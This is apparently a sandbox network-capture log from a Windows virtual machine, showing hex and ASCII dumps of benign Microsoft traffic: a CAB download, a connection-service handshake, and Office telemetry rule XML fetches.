2024-11-04 16:31:30 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: f84c4677-93a5-4224-9c49-09089be8977d MS-RequestId: ce876b8d-3a71-419b-a8d0-61f7d327539b MS-CV: 2mL937qQgEm4nFJY.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 04 Nov 2024 16:31:29 GMT Connection: close Content-Length: 24490
2024-11-04 16:31:30 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-04 16:31:30 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.5	49759	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:30 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 50 67 71 6d 41 32 2b 79 30 2b 72 41 42 57 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 63 62 35 34 34 34 35 64 61 35 66 66 35 38 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: OPgqmA2+y0+rABWk.1Context: ccb54445da5ff58f
2024-11-04 16:31:30 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-04 16:31:30 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 50 67 71 6d 41 32 2b 79 30 2b 72 41 42 57 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 63 62 35 34 34 34 35 64 61 35 66 66 35 38 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 51 6e 50 35 6e 79 30 73 4f 50 46 38 2f 39 73 66 6b 6b 38 39 4a 49 68 73 36 7a 75 59 33 54 4c 6a 75 30 65 6d 73 75 46 63 42 6e 7a 37 38 4b 75 4f 38 55 75 44 74 45 35 6b 53 35 57 7a 4b 72 59 62 46 41 6d 30 2b 69 35 59 47 65 7a 35 6b 70 78 7a 48 67 50 30 57 67 77 53 71 32 4b 58 35 76 37 69 79 51 51 43 42 64 65 77 6a 45 45 36 4c Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: OPgqmA2+y0+rABWk.2Context: ccb54445da5ff58f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAQnP5ny0sOPF8/9sfkk89JIhs6zuY3TLju0emsuFcBnz78KuO8UuDtE5kS5WzKrYbFAm0+i5YGez5kpxzHgP0WgwSq2KX5v7iyQQCBdewjEE6L
2024-11-04 16:31:30 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4f 50 67 71 6d 41 32 2b 79 30 2b 72 41 42 57 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 63 62 35 34 34 34 35 64 61 35 66 66 35 38 66 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: OPgqmA2+y0+rABWk.3Context: ccb54445da5ff58f
2024-11-04 16:31:30 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-04 16:31:30 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4f 6c 6c 5a 59 41 39 46 36 55 36 2f 5a 72 61 34 6d 4c 37 51 79 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: OllZYA9F6U6/Zra4mL7QyQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.5	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:30 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:30 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:30 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 0b0db4b6-501e-0016-6d58-2e181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163130Z-176bd8f9bc5wvvmqhC1DFWsr0w000000011g00000000k5ud x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:30 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.5	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:30 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:30 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:30 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163130Z-16547b76f7fx6rhxhC1DFW76kg00000003wg00000000cbgs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:30 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:30 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:30 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 1504f0f6-801e-0015-3c58-2ef97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163130Z-r159446fcd7qnkbbhC1DFW9wcw00000002g0000000007fbm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:30 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.5	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:31 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:31 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 2676c640-401e-0048-235f-2e0409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163131Z-15869dbbcc6tfpj2hC1DFWvt5g00000003zg000000000dhs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:31 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.5	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:31 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:31 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 02991241-f01e-005d-3958-2e13ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163131Z-r159446fcd7rrldkhC1DFWbc4g00000004pg000000007m4r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:31 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:31 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:31 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 599d45ad-a01e-0098-7555-2e8556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163131Z-176bd8f9bc5pqws8hC1DFW15kc00000005m000000000210u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:31 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:32 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:32 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 1e70bdcb-401e-0029-2301-2d9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163132Z-16547b76f7fx6rhxhC1DFW76kg00000003rg00000000we58 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:32 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.5	49770	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:32 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:32 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:32 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: f5f9e784-f01e-0071-765c-2e431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163132Z-15869dbbcc6sg5zbhC1DFWbk2000000003sg00000000bxmg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:32 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.5	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:32 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:32 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:32 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 9919728d-d01e-002b-4b0b-2d25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163132Z-16547b76f7frbg6bhC1DFWr54000000003w0000000005rg7 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
